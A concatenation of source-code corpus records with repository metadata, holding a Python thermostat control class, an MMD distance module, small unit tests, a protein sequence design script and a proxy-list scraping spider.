return int(_get_bit(data[0], 1)) + 254
@property
def cool_cycle_rate(self):
"""
:return: % or one of THERMOSTAT_CYCLE_RATE_* constants
"""
data = self._get_mdi(21, 0)
if data[0]:
return float(data[0]) * 0.5
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 0)) + 254
@property
def sensor_d_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 7))
res = _set_bit(res, 0, _get_bit(data[0], 6))
return res
@property
def sensor_c_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 5))
res = _set_bit(res, 0, _get_bit(data[0], 4))
return res
@property
def sensor_b_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 3))
res = _set_bit(res, 0, _get_bit(data[0], 2))
return res
@property
def sensor_a_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 1))
res = _set_bit(res, 0, _get_bit(data[0], 0))
return res
@property
def sensor_local_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 7))
res = _set_bit(res, 0, _get_bit(data[0], 6))
return res
@property
def type(self):
"""
:return: one of THERMOSTAT_TYPE_* constants
"""
data = self._get_mdi(12, 0)
return int(_get_bit(data[0], 4))
@property
def schedule_profile_type(self):
"""
:return: one of THERMOSTAT_PROFILE_TYPE_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 3))
res = _set_bit(res, 0, _get_bit(data[0], 2))
return res
@schedule_profile_type.setter
def schedule_profile_type(self, value):
packet = HeatProfileChange()
packet.set_command_data(
self.schedule_interval_type,
value,
self.heat_schedule
)
self._send(packet)
packet = CoolProfileChange()
packet.set_command_data(
self.schedule_interval_type,
value,
self.cool_schedule
)
self._send(packet)
@property
def cool_schedule(self):
return None
@property
def heat_schedule(self):
return None
@property
def schedule_interval_type(self):
"""
:return: one of THERMOSTAT_INTERVAL_TYPE_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 1))
res = _set_bit(res, 0, _get_bit(data[0], 0))
return res
@schedule_interval_type.setter
def schedule_interval_type(self, value):
packet = HeatProfileChange()
packet.set_command_data(
value,
self.schedule_profile_type,
self.heat_schedule
)
self._send(packet)
packet = CoolProfileChange()
packet.set_command_data(
value,
self.schedule_profile_type,
self.cool_schedule
)
self._send(packet)
@property
def air_handler_lockout_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(13, 0)
return data[0]
@property
def uv_lamp_time(self):
"""
:return: days
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(14, 1)
return data[0] << 8 | data[1]
@uv_lamp_time.setter
def uv_lamp_time(self, value):
packet = ChangeUvLightMaintenanceTimer()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def humidifier_pad_time(self):
"""
:return: hours
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(16, 1)
return data[0] << 8 | data[1]
@humidifier_pad_time.setter
def humidifier_pad_time(self, value):
packet = ChangeHumidifierPadMaintTimerall()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def aux_heat_stages(self):
"""
:return: 0x0F = modulating
"""
data = self._get_mdi(18, 0)
return data[0] << 4 & 0xF
@property
def fan_stages(self):
"""
:return: 0x0F = modulating
"""
data = self._get_mdi(18, 0)
return data[0] & 0xF
@property
def aux_heat_cycle_rate(self):
"""
:return: Default/Unused is 0; Percentage - 0.5% Increments.
"""
data = self._get_mdi(19, 0)
return data[0]
@property
def ob_mode(self):
"""
:return: 0 = O Mode/Unavailable; 1 = B Mode
"""
data = self._get_mdi(22, 0)
return int(_get_bit(data[0], 6))
@property
def beep(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(22, 0)
return int(_get_bit(data[0], 5))
@beep.setter
def beep(self, value):
packet = BeeperEnable()
packet.set_command_data(value)
self._send(packet)
@property
def display_contrast(self):
data = self._get_mdi(24, 0)
return data[0]
@property
def communication_timeout(self):
"""
:return: seconds
"""
data = self._get_mdi(25, 1)
return data[0] << 8 | data[1]
def enable_communications_receiver(self, value):
packet = CommunicationsReceiverOnOff()
packet.set_command_data(value)
self._send(packet)
@property
def display_phone_number_on_fault(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(27, 0)
return int(_get_bit(data[0], 0))
@display_phone_number_on_fault.setter
def display_phone_number_on_fault(self, value):
packet = ForcePhoneNumberDisplay()
packet.set_command_data(value)
self._send(packet)
@property
def indoor_unit_node_type(self):
"""
:return: one of node_types.NODE_TYPE_* constants
"""
data = self._get_mdi(28, 0)
return data[0]
@property
def outdoor_unit_node_type(self):
"""
:return: one of node_types.NODE_TYPE_* constants
"""
data = self._get_mdi(29, 0)
return data[0]
@property
def humidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 3))
@property
def dehumidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 2))
@property
def independent_humidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 1))
@property
def independent_dehumidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 0))
@property
def allowed_schedule_profiles(self):
res = []
data = self._get_mdi(31, 0)
if _get_bit(data[0], 3): # 5-2
res += [THERMOSTAT_PROFILE_TYPE_5_2]
if _get_bit(data[0], 2): # 7-day
res += [THERMOSTAT_PROFILE_TYPE_7_DAY]
if _get_bit(data[0], 1): # 5-1-1
res += [THERMOSTAT_PROFILE_TYPE_5_1_1]
if _get_bit(data[0], 0): # Non Programmable
res += [THERMOSTAT_PROFILE_TYPE_NON_PROGRAMMABLE]
return res
@property
def allowed_schedule_intervals(self):
res = []
data = self._get_mdi(32, 0)
if _get_bit(data[0], 2): # 2 step
res += [THERMOSTAT_INTERVAL_TYPE_2_STEP]
if _get_bit(data[0], 1): # Non Programmable
res += [THERMOSTAT_INTERVAL_TYPE_NON_PROGRMMABLE]
if _get_bit(data[0], 0): # 4 step
res += [THERMOSTAT_INTERVAL_TYPE_4_STEP]
return res
@property
def critical_fault(self):
data = self._get_status_mdi(0, 0)
return data[0]
@property
def minor_fault(self):
data = self._get_status_mdi(1, 0)
return data[0]
@property
def operating_status(self):
"""
:return: one of THERMOSTAT_SYSTEM_STATUS_
"""
data = self._get_status_mdi(2, 0)
return data[0]
@operating_status.setter
def operating_status(self, value):
packet = SystemSwitchModify()
packet.set_command_data(value)
self._send(packet)
@property
def curtailment_status(self):
"""
:return: one of THERMOSTAT_CURTAILMENT_STATUS_* constants
"""
data = self._get_status_mdi(3, 0)
return data[0]
@property
def humidification_setpoint(self):
data = self._get_status_mdi(4, 0)
return data[0]
@humidification_setpoint.setter
def humidification_setpoint(self, value):
packet = HumidificationSetPointModify()
packet.set_command_data(value)
self._send(packet)
@property
def dehumidification_setpoint(self):
data = self._get_status_mdi(5, 0)
return data[0]
@dehumidification_setpoint.setter
def dehumidification_setpoint(self, value):
packet = DehumidificationSetPointModify()
packet.set_command_data(value)
self._send(packet)
@property
def working_setpoint(self):
data = self._get_status_mdi(6, 0)
return data[0]
@property
def display_temp(self):
data = self._get_status_mdi(7, 1)
value = data[0] << 8 | data[1]
temp = value << 4 & 0xF
frac = value & 0xF
frac /= float(10)
return temp + frac
@property
def heat_setpoint(self):
data = self._get_status_mdi(9, 0)
return data[0]
@heat_setpoint.setter
def heat_setpoint(self, value):
packet = HeatSetPointTemperatureModify()
packet.set_command_data(value)
self._send(packet)
@property
def cool_setpoint(self):
data = self._get_status_mdi(10, 0)
return data[0]
@cool_setpoint.setter
def cool_setpoint(self, value):
packet = CoolSetPointTemperatureModify()
packet.set_command_data(value)
self._send(packet)
@property
def daylight_savings(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(22, 0)
return int(_get_bit(data[0], 0))
@daylight_savings.setter
def daylight_savings(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
bool(self.clock_lockout),
value,
self.gmt_offset,
self.date_time
)
self._send(packet)
@property
def clock_lockout(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(22, 0)
return int(_get_bit(data[0], 7))
@clock_lockout.setter
def clock_lockout(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
value,
bool(self.daylight_savings),
self.gmt_offset,
self.date_time
)
self._send(packet)
@property
def gmt_offset(self):
data = self._get_status_mdi(23, 0)
return TwosCompliment.decode(data[0] / 4, 8)
@gmt_offset.setter
def gmt_offset(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
bool(self.clock_lockout),
bool(self.daylight_savings),
value,
self.date_time
)
self._send(packet)
@property
def date_time(self):
weekday = self._get_status_mdi(11, 0)[0]
year = self._get_status_mdi(25, 0)[0]
month = self._get_status_mdi(26, 0)[0]
day = self._get_status_mdi(27, 0)[0]
hour = self._get_status_mdi(12, 0)[0]
minute = self._get_status_mdi(13, 0)[0]
second = self._get_status_mdi(14, 0)[0]
if 0xFF in (weekday, year, month, day, hour, minute, second):
return
year += 2000
month += 1
return datetime.datetime(
month=month,
day=day,
year=year,
hour=hour,
minute=minute,
second=second
)
@date_time.setter
def date_time(self, value):
packet = RealTimeDayOverride()
packet.set_command_data(value)
self._send(packet)
@property
def programmable_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 3))
@property
def startup_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 2))
@property
def temporary_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 1))
@temporary_hold.setter
def temporary_hold(self, value):
packet = SetPointTempAndTemporaryHold()
packet.set_command_data(value)
self._send(packet)
@property
def permanent_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 0))
@permanent_hold.setter
def permanent_hold(self, value):
packet = PermanentSetPointTempHoldModify()
packet.set_command_data(value)
self._send(packet)
def hold_override(self):
packet = HoldOverride()
packet.set_command_data(THERMOSTAT_DISABLED)
self._send(packet)
@property
def temporary_hold_remaining(self):
"""
:return: minutes
"""
data = self._get_status_mdi(16, 1)
return data[0] << 8 | data[1]
@temporary_hold_remaining.setter
def temporary_hold_remaining(self, value):
packet = SetPointTempTimeHold()
packet.set_command_data(self.working_setpoint, value)
self._send(packet)
@property
def dehumidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(18, 0)
return data[0] * 0.5
@dehumidification_demand.setter
def dehumidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = DehumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def humidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(19, 0)
return data[0] * 0.5
@humidification_demand.setter
def humidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(20, 0)
return data[0] * 0.5
@heat_demand.setter
def heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def cool_demand(self):
"""
:return:
"""
data = self._get_status_mdi(21, 0)
return data[0] * 0.5
@cool_demand.setter
def cool_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = CoolDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def fan_demand(self):
"""
:return:
"""
data = self._get_status_mdi(22, 0)
return data[0] * 0.5
def fan_demand_manual(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_MANUAL, value)
self._send(packet)
fan_demand_manual = property(fset=fan_demand_manual)
def fan_demand_cool(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_COOL, value)
self._send(packet)
fan_demand_cool = property(fset=fan_demand_cool)
def fan_demand_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_HEAT, value)
self._send(packet)
fan_demand_heat = property(fset=fan_demand_heat)
def fan_demand_aux_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_AUX_HEAT, value)
self._send(packet)
fan_demand_aux_heat = property(fset=fan_demand_aux_heat)
def fan_demand_emergency_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_EMERGENCY_HEAT, value)
self._send(packet)
fan_demand_emergency_heat = property(fset=fan_demand_emergency_heat)
def fan_demand_defrost(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_DEFROST, value)
self._send(packet)
fan_demand_defrost = property(fset=fan_demand_defrost)
@property
def emergency_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(23, 0)
return data[0] * 0.5
@emergency_heat_demand.setter
def emergency_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = BackUpHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def aux_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(24, 0)
return data[0] * 0.5
@aux_heat_demand.setter
def aux_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = AuxHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def relative_humidity(self):
"""
:return:
"""
data = self._get_status_mdi(28, 0)
return data[0]
@property
def vacation_mode(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(29, 0)
return int(data[0])
@vacation_mode.setter
def vacation_mode(self, value):
packet = VacationMode()
packet.set_command_data(value)
self._send(packet)
def vacation_mode_setpoints(self, heat_setpoint, cool_setpoint):
packet = VacationMode()
packet.set_command_data(self.vacation_mode, heat_setpoint, cool_setpoint)
self._send(packet)
@property
def fan_mode_setting(self):
"""
:return: one of THERMOSTAT_FAN_STATUS_* constants
"""
data = self._get_status_mdi(30, 0)
return data[0]
@fan_mode_setting.setter
def fan_mode_setting(self, value):
packet = FanKeySelection()
packet.set_command_data(value)
self._send(packet)
def restore_factory_defaults(self):
packet = RestoreFactoryDefaults()
packet.set_command_data()
self._send(packet)
THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_START = 0x01
THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_STOP = 0x00
def subsystem_installation_test(self, state):
"""
:param state: one of THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_* constants
:return:
"""
packet = SubsystemInstallationTest()
packet.set_command_data(state)
self._send(packet)
def set_display_text(
self,
area_id,
duration,
blink,
reverse,
text_id,
text
):
"""
:param area_id: 0 - 7
:param duration: 0.0 - 7.5
:param blink: True/False
:param reverse: True/False
:param text_id: 0 - 7
:param text:
:return:
"""
packet = CustomMessageAreaDisplayData()
packet.set_command_data(
area_id,
duration,
blink,
reverse,
text_id,
text
)
self._send(packet)
# ReversingValveConfig,
# HumDehumConfig
| 26.212549 | 81 | 0.611502 |
df272570f222a6e7598bb9c9110ef9a702ebe7c3 | 2,276 | py | Python | code/distance/mmd_numpy_sklearn.py | lw0517/transferlearning | 230df8850b09f896a799ad865072c0164f45fadc | [
"MIT"
] | 9,657 | 2017-05-01T03:29:35.000Z | 2022-03-31T21:25:30.000Z | code/distance/mmd_numpy_sklearn.py | xiaohuihui-com/transferlearning | 17583db86db19709ff483a24590f0d5b88e25fe5 | [
"MIT"
] | 262 | 2017-09-16T09:33:02.000Z | 2022-03-30T05:08:45.000Z | code/distance/mmd_numpy_sklearn.py | xiaohuihui-com/transferlearning | 17583db86db19709ff483a24590f0d5b88e25fe5 | [
"MIT"
] | 3,273 | 2017-05-01T06:28:31.000Z | 2022-03-31T09:57:48.000Z | # Compute MMD (maximum mean discrepancy) using numpy and scikit-learn.
import numpy as np
from sklearn import metrics
def mmd_linear(X, Y):
"""MMD using linear kernel (i.e., k(x,y) = <x,y>)
Note that this is not the original linear MMD, only the reformulated and faster version.
The original version is:
def mmd_linear(X, Y):
XX = np.dot(X, X.T)
YY = np.dot(Y, Y.T)
XY = np.dot(X, Y.T)
return XX.mean() + YY.mean() - 2 * XY.mean()
Arguments:
X {[n_sample1, dim]} -- [X matrix]
Y {[n_sample2, dim]} -- [Y matrix]
Returns:
[scalar] -- [MMD value]
"""
delta = X.mean(0) - Y.mean(0)
return delta.dot(delta.T)
def mmd_rbf(X, Y, gamma=1.0):
"""MMD using rbf (gaussian) kernel (i.e., k(x,y) = exp(-gamma * ||x-y||^2 / 2))
Arguments:
X {[n_sample1, dim]} -- [X matrix]
Y {[n_sample2, dim]} -- [Y matrix]
Keyword Arguments:
gamma {float} -- [kernel parameter] (default: {1.0})
Returns:
[scalar] -- [MMD value]
"""
XX = metrics.pairwise.rbf_kernel(X, X, gamma)
YY = metrics.pairwise.rbf_kernel(Y, Y, gamma)
XY = metrics.pairwise.rbf_kernel(X, Y, gamma)
return XX.mean() + YY.mean() - 2 * XY.mean()
def mmd_poly(X, Y, degree=2, gamma=1, coef0=0):
"""MMD using polynomial kernel (i.e., k(x,y) = (gamma <X, Y> + coef0)^degree)
Arguments:
X {[n_sample1, dim]} -- [X matrix]
Y {[n_sample2, dim]} -- [Y matrix]
Keyword Arguments:
degree {int} -- [degree] (default: {2})
gamma {int} -- [gamma] (default: {1})
coef0 {int} -- [constant item] (default: {0})
Returns:
[scalar] -- [MMD value]
"""
XX = metrics.pairwise.polynomial_kernel(X, X, degree, gamma, coef0)
YY = metrics.pairwise.polynomial_kernel(Y, Y, degree, gamma, coef0)
XY = metrics.pairwise.polynomial_kernel(X, Y, degree, gamma, coef0)
return XX.mean() + YY.mean() - 2 * XY.mean()
if __name__ == '__main__':
a = np.arange(1, 10).reshape(3, 3)
b = [[7, 6, 5], [4, 3, 2], [1, 1, 8], [0, 2, 5]]
b = np.array(b)
print(a)
print(b)
print(mmd_linear(a, b)) # 6.0
print(mmd_rbf(a, b)) # 0.5822
print(mmd_poly(a, b)) # 2436.5
| 29.558442 | 92 | 0.554921 |
c231f9aa2b633e77d6ede57e27199c53e08e88e7 | 885 | py | Python | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | import unittest
import nationstates_async as core
class ShardTest(unittest.TestCase):
def test_shard(self):
self.assertEqual(
core.Shard("numnations")._get_main_value(),
"numnations")
def test_shard_tail_gen(self):
self.assertEqual(core.Shard("dispatch", dispatchid="1").tail_gen(), {"dispatchid":"1"})
def test_shard_repr(self):
self.assertIsInstance(core.Shard("test").__repr__(), str)
self.assertIsInstance(core.Shard("test", test="test").__repr__(), str)
def test_shard_ShardError(self):
self.assertRaises(ValueError, core.Shard, None)
def test_shard_string(self):
try:
str(core.Shard("TEST"))
core.Shard("TEST").name
except:
self.fail()
def test_shard_eq(self):
self.assertEqual(core.Shard("TEST"), core.Shard("TEST"))
| 27.65625 | 95 | 0.630508 |
d90b9d9a2c24180c78639f68097d6c11e0ed8d0a | 883 | py | Python | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | #/usr/bin/env python
#
# Copyright 2020-2021 John T. Foster
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import unittest
class TestSolution(unittest.TestCase):
def test_plot_0(self):
assert os.path.isfile('plot_0.png')
def test_plot_1(self):
assert os.path.isfile('plot_1.png')
if __name__ == '__main__':
unittest.main()
| 27.59375 | 74 | 0.722537 |
12f079c8867b07599ae62ec24d2d300a471fdec1 | 5,679 | py | Python | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | 2 | 2021-04-30T06:07:49.000Z | 2021-06-30T06:47:00.000Z | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | null | null | null | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import torch
from physics.protein_os import Protein
import options
from physics.anneal import AnnealSeq
import os
import h5py
from tqdm import tqdm
from utils import test_setup
"""
do mutations & design for a sample of protein backbones.
"""
#################################################
parser = options.get_fold_parser()
args = options.parse_args_and_arch(parser)
device, model, energy_fn, ProteinBase = test_setup(args)
torch.set_grad_enabled(False)
#################################################
def load_protein(root_dir, pdb_id, mode, device, args):
amino_acids = pd.read_csv('data/amino_acids.csv')
vocab = {x.upper(): y - 1 for x, y in zip(amino_acids.AA3C, amino_acids.idx)}
df_beads = pd.read_csv(f'{root_dir}/{pdb_id}_bead.csv')
seq = df_beads['group_name'].values
seq_id = df_beads['group_name'].apply(lambda x: vocab[x]).values
if mode == 'CA':
coords = df_beads[['xca', 'yca', 'zca']].values
elif mode == 'CB':
coords = df_beads[['xcb', 'ycb', 'zcb']].values
else:
raise ValueError('mode should be CA / CB.')
coords = torch.tensor(coords, dtype=torch.float, device=device)
profile = torch.tensor(seq_id, dtype=torch.long, device=device)
return seq, coords, profile
# root_dir = 'data/design/cullpdb_val_sample'
root_dir = 'data/design/cullpdb_val_deep'
# root_dir = 'data/design/ref'
protein_sample = pd.read_csv(f'{root_dir}/sample.csv')
pdb_selected = protein_sample['pdb'].values
np.random.shuffle(pdb_selected)
design_engine = args.fold_engine
mode = args.mode
exp_id = args.load_exp[-5:]
save_dir = args.save_dir
if not os.path.exists(f'{root_dir}/{save_dir}'):
os.mkdir(f'{root_dir}/{save_dir}')
for pdb_id in tqdm(pdb_selected):
if os.path.exists(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5'):
continue
seq, coords_native, profile = load_protein(root_dir, pdb_id, mode, device, args)
# skip long sequences
# if len(seq) > 400:
# continue
protein_native = Protein(seq, coords_native, profile)
energy_native = protein_native.get_energy(energy_fn).item()
print('energy_native:', energy_native)
residue_energy = protein_native.get_residue_energy(energy_fn)
print(profile)
print(residue_energy)
protein = Protein(seq, coords_native.clone(), profile.clone())
if args.random_init:
protein.profile = torch.randint(0, 20, profile.size(), device=profile.device)
energy_init = protein.get_energy(energy_fn).item()
print('energy_init:', energy_init)
if design_engine != 'mutation':
# simulated annealing
torch.set_grad_enabled(False)
anneal_steps = int(args.L * (seq.shape[0] / 50.0))
annealer = AnnealSeq(energy_fn, protein, seq_move_type=args.seq_move_type,
T_max=args.T_max, T_min=args.T_min, L=anneal_steps)
annealer.run()
profile_best = annealer.x_best
energy_best = annealer.energy_best
sample = annealer.sample
sample_energy = annealer.sample_energy
profile_native = protein_native.profile
recovery = (profile_native.cpu().numpy() == profile_best.cpu().numpy())
print(pdb_id, recovery.sum(), float(recovery.sum()) / protein.profile.size(0))
# save sampled structures
sample_profile = [profile_native.cpu(), profile_best.cpu()] + sample
sample_profile = torch.stack(sample_profile, dim=0).numpy()
with h5py.File(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5', 'w') as f:
profile_dtype = 'f4' if args.seq_type == 'profile' else 'i1'
dset = f.create_dataset("profile", shape=sample_profile.shape, data=sample_profile, dtype=profile_dtype)
sample_energy = [energy_native, energy_best] + sample_energy
pd.DataFrame({'sample_energy': sample_energy}).to_csv(f'{root_dir}/{save_dir}/{pdb_id}_energy.csv', index=False)
else:
torch.set_grad_enabled(False)
n = protein.profile.size(0)
sample_energy = np.zeros((n, 20))
for i in tqdm(range(n)):
res_i = protein.profile[i].item()
for j in range(20):
protein.profile[i] = j
sample_energy[i, j] = protein.get_energy(energy_fn).item()
protein.profile[i] = res_i
# energy_best = sample_energy.min()
assert(torch.sum(protein_native.profile == protein.profile) == n)
profile = protein.profile.cpu().numpy()
profile_min = np.argmin(sample_energy, axis=1)
recovery = (profile == profile_min)
print(pdb_id, recovery.sum(), float(recovery.sum()) / n, recovery)
# df_profile = pd.read_csv(f'{root_dir}/{pdb_id}_profile.csv')
# f_profile = df_profile[[f'aa{i}' for i in range(20)]].values
# kT = 0.01
# energy_min = np.min(sample_energy, axis=1)
# delta_energy = sample_energy - energy_min[:, None]
# p = np.exp(-delta_energy / kT)
# weighted_p = np.sum(p * f_profile, axis=1) / np.sum(p, axis=1)
# weighted_recovery = weighted_p.mean()
# print(np.sum(p, axis=1), weighted_recovery)
with h5py.File(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5', 'w') as f:
dset = f.create_dataset("wt_residue_energy", shape=residue_energy.shape, data=residue_energy, dtype='f4')
dset = f.create_dataset("mutant_energy", shape=sample_energy.shape, data=sample_energy, dtype='f4')
dset = f.create_dataset("seq", shape=profile.shape, data=profile, dtype='f4')
# dset = f.create_dataset("profile", shape=f_profile.shape, data=f_profile, dtype='f4')
| 37.86 | 120 | 0.652756 |
5e194563bbccd614c6118296f7c6047a96c166cb | 2,310 | py | Python | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | null | null | null | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | 3 | 2021-03-18T20:24:09.000Z | 2021-12-13T19:44:52.000Z | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | null | null | null | # coding=utf-8
import json
import random
import re
import requests
from proxy import Proxy
from .basespider import BaseSpider
class GatherproxySpider(BaseSpider):
name = 'gatherproxy'
def __init__(self, *a, **kwargs):
super(GatherproxySpider, self).__init__(*a, **kwargs)
self.urls = [
'http://gatherproxy.com/',
'http://www.gatherproxy.com/proxylist/anonymity/?t=Anonymous',
'http://gatherproxy.com/proxylist/country/?c=China',
]
self.headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Host': 'www.gatherproxy.com',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0'
}
# self.proxies = self.get_proxy()
self.init()
def parse_page(self, response):
pattern = re.compile('gp.insertPrx\((.*?)\)', re.RegexFlag.S)
items = re.findall(pattern, response.body)
for item in items:
data = json.loads(item)
# 端口用的是十六进制
port = data.get('PROXY_PORT')
port = str(int(port, 16))
proxy = Proxy()
proxy.set_value(
ip=data.get('PROXY_IP'),
port=port,
country=data.get('PROXY_COUNTRY'),
anonymity=data.get('PROXY_TYPE'),
source=self.name,
)
self.add_proxy(proxy=proxy)
def get_proxy(self):
try:
url = 'http://127.0.0.1:8000/?name={0}'.format(self.name)
r = requests.get(url=url)
if r.text != None and r.text != '':
data = json.loads(r.text)
if len(data) > 0:
proxy = random.choice(data)
ip = proxy.get('ip')
port = proxy.get('port')
address = '%s:%s' % (ip, port)
proxies = {
'http': 'http://%s' % address
}
return proxies
except:
return None
| 31.216216 | 110 | 0.500433 |
36cb5ffc63ed294cf2159a4fc777d17b8cddca33 | 620 | py | Python | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
] | 20 | 2017-12-22T18:29:55.000Z | 2021-09-12T15:04:39.000Z | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
